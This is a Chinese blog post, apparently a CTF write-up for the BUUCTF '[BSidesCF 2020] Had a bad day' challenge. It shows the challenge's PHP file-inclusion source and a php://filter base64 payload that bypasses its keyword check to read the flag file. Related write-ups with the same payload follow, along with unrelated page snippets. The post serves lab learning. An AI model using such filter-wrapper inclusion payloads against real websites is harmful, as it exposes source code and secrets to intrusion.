[BSidesCF 2020]Had a bad day

最新推荐文章于 2024-08-17 22:56:29 发布
最新推荐文章于 2024-08-17 22:56:29 发布
阅读量370 收藏
点赞数
分类专栏: BUUCTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127136358
版权

有get传参的点,疑似文件包含

尝试:php://filter/convert.base64-encode/resource=index.php

报错了

他这里有两个后缀,我们去掉一个

得到源码

<?php
$file = $_GET['category'];

if(isset($file))
{
    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
    include ($file . '.php');
}else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>

传入的category参数必须有woofers或者meowers或者index

payload:

?category=php://filter/convert.base64-encode/index/resource=flag

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【buu-BSideCF-2020-Had a bad day1】
lalalalafan的博客
11-15 2791
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含 2.读源码 ?category=php://filter/read=convert.base64-encode/resource=index.php 报错了,后端自己加上了.php,所以我们删了 ?category=php://filter/read=convert.base64-encode/resource=index 就可以得到base64编码后的源码了 解码得到源码 <?php $file = $
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 253
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
Bad Hair Day (单调栈)(C语言)
weixin_51424157的博客
05-19 182
Bad Hair Day一、 题目描述二、解题思路三、ac代码 一、 题目描述 Some of Farmer John’s N cows (1 ≤ N ≤ 80,000) are having a bad hair day! Since each cow is self-conscious about her messy hairstyle, FJ wants to count the number of other cows that can see the top of other cows’ head
php禁止目录遍历,使用PHP遍历文件目录与清除目录中文件的实现详解
weixin_36053019的博客
03-17 111
今天无聊中练习了一下PHP遍历文件目录的程序,编写了以下两个程序,不过质量不是很好,轻拍~~~1、清除PHP缓存文件function read_dir($dir,$file){$a =strpos($file,".php");if($a>0){unlink($dir . $file);echo "delete $dir$file ";return true;}if(strpos($file,...
buuctf(探险3)
qq_62046696的博客
08-13 948
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 1031
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东开心.doc
10-13
小学教案
hada-p2
03-13
【标题】"hada-p2"可能是指一个项目或者软件的本号,通常在软件开发中,"p2"可能是代表第二个主要本或一个特定的迭代。在这个上下文中,我们推测"hada-p2"可能是一个基于C#语言的项目。 【描述】由于描述仅为...
HADA protocol-开源
04-28
《HADA协议——开源软件在序列比对中的应用》 HADA协议,全称为Hierarchical Annotation Dependent Alignment,是一种用于序列比对的高效且灵活的方法。这个协议的开源实现为生物信息学研究提供了强大的工具,使得...
hada-p3
03-27
hada-p3
文件上传-.user.ini利用
feiwujiushiwo的博客
08-13 258
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
RabbitMQ-消息队列之routing使用
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-17 142
RabbitMQ-消息队列之routing使用
思科RIP动态路由配置3
2302_76730689的博客
08-14 650
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
wordpress网站“ERR_CONNECTION_REFUSED”错误
最新发布
xiaoyuya
08-17 127
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
PHP多项目多场景排队叫号系统源码
2401_84414018的博客
08-16 389
多项目多场景排队叫号系统的出现,不仅极大地改善了顾客的等待体验,也提升了服务机构的工作效率和管理水平。它让等待不再是一种负担,而是一种高效有序的享受。未来,随着技术的不断进步和应用场景的不断拓展,相信多项目多场景排队叫号系统将会为更多行业带来便捷和高效。让我们一起期待更加美好的智能服务时代吧!🚀🌟。
[Zer0pts2020]Can you guess it?1
kw741951的博客
08-17 114
打开题目看到信息随便输入一个数,显示错误查看源代码看到php代码,代码审计phpexit();} else {?= $message?>php }?
搭建高可用OpenStack(Queen)集群(十二)之启动一个实例
happy_king_zi的博客
08-13 804
我这边只有一个测试网络,就选它了(他也是默认网络))点击下一项,允许实例添加scheduler hint(可以选择,也可以直接创建)(我这边直接跳过了)点击下一项,允许实例添加元数据(可选择,也可自己设定)(我这边直接跳过了)左边选项:项目 --> 网络 --> 网络子项(可见刚才命令创建的网络)点击下一项,选择服务器组(我这边没有设定,所有没有,直接跳过)点击下一项,选择网络端口,图如下(我这边没有设定,直接跳过了)左边选项:项目 --> 网络 --> 路由(设置网关)点击创建实例,下面是创建实例过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值